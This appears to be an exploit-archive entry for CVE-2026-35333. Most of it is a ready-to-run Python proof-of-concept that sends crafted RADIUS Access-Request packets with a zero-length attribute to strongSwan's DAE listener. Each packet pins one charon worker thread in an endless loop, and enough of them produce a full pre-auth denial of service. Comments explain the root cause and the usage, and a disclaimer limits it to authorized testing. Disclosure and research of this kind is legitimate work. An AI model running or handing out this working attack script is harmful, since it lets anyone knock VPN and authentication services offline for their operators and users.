strongSwan 5.9.13 - DoS

Indicators of Compromise

• exploit-code: # Exploit Title: strongSwan 5.9.13 - DoS # Date: 2026-05-13 # Exploit Author: Lukas Johannes Moeller # Vendor Homepage: https://www.strongswan.org/ # Software Link: https://download.strongswan.org/strongswan-5.9.13.tar.bz2 # Version: strongSwan <= 5.9.13 (eap-radius plugin built with DAE enabled) # Tested on: Debian 12 bookworm, charon 5.9.13 built from upstream tarball, # strongswan.conf charon.plugins.eap-radius.dae.enable = yes, # listener bound on UDP/3799 # CVE: CVE-2026-35333 # References: # https://github.com/strongswan/strongswan/commit/e067d24293 # https://nvd.nist.gov/vuln/detail/CVE-2026-35333 # https://github.com/JohannesLks/CVE-2026-35333 # # Description: # attribute_enumerate() in src/libradius/radius_message.c walks the # attribute list of a RADIUS message without rejecting an attribute # whose length byte is 0. For length == 0, this->next never advances # and the per-attribute length computation `this->next->length - # sizeof(rattr_t)` underflows to (size_t)-2. The result is an # infinite loop pegging one charon worker thread at 100% CPU. # # The reachability detail that turns this into a pre-auth bug: # radius_message_t::verify() uses the SAME broken iterator to find # Message-Authenticator BEFORE the Response-Authenticator MD5 check # is applied. For RADIUS code 1 (Access-Request) verify() skips the # MD5 check entirely. So a malformed Access-Request with a single # zero-length attribute as its first attribute traps the worker # thread without any knowledge of the DAE shared secret. # # N packets exhaust N worker threads -> full DAE denial of service. # # Usage: # python3 strongswan-5.9.13-radius-dae-dos.py --target 10.0.0.1 # python3 strongswan-5.9.13-radius-dae-dos.py --target 10.0.0.1 --count 8 # # Observe on the target: # ps -L -p $(pidof charon) -o tid,pcpu,stat,wchan:25,cmd # -> one or more threads in state R at ~100% CPU, never returning. # # Disclaimer: # For authorized testing and defensive research only. Do not use # against systems you do not own or have explicit permission to test. import argparse import os import socket import struct import sys import time ACCESS_REQUEST = 1 RAT_USER_NAME = 1 def build_zero_length_attr_packet() -> bytes: identifier = os.urandom(1)[0] authenticator = os.urandom(16) # 20-byte RADIUS header + 2-byte attribute (type=User-Name, length=0) total_len = 22 header = struct.pack("!BBH16s", ACCESS_REQUEST, identifier, total_len, authenticator) attribute = struct.pack("!BB", RAT_USER_NAME, 0) return header + attribute def send_packet(packet: bytes, target: str, port: int, wait: float) -> None: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(wait) sock.sendto(packet, (target, port)) print(f"[+] sent {len(packet)} bytes to {target}:{port}/udp") try: data, addr = sock.recvfrom(4096) print(f"[-] unexpected response {len(data)} bytes from {addr}:" f" {data[:32].hex()}") except socket.timeout: print(f"[+] no response within {wait:.1f}s -- expected for hung worker") finally: sock.close() def main() -> int: p = argparse.ArgumentParser( description="CVE-2026-35333 strongSwan RADIUS DAE pre-auth DoS" ) p.add_argument("--target", required=True, help="DAE listener IPv4 address (e.g. 10.0.0.1)") p.add_argument("--port", type=int, default=3799, help="DAE listener UDP port (default: 3799)") p.add_argument("--count", type=int, default=1, help="Number of crafted packets to send (default: 1)") p.add_argument("--wait", type=float, default=2.0, help="Per-packet response timeout in seconds (default: 2.0)") args = p.parse_args() payload = build_zero_length_attr_packet() for i in range(args.count): print(f"\n[*] crafted packet #{i + 1}: Access-Request with " "zero-length User-Name attribute") send_packet(payload, args.target, args.port, args.wait) time.sleep(0.2) print("\n[+] done; expected effect: one charon worker thread per packet " "stuck at 100% CPU.") print(" Verify on the target with: ps -L -p $(pidof charon) " "-o tid,pcpu,stat,wchan:25,cmd") return 0 if __name__ == "__main__": sys.exit(main())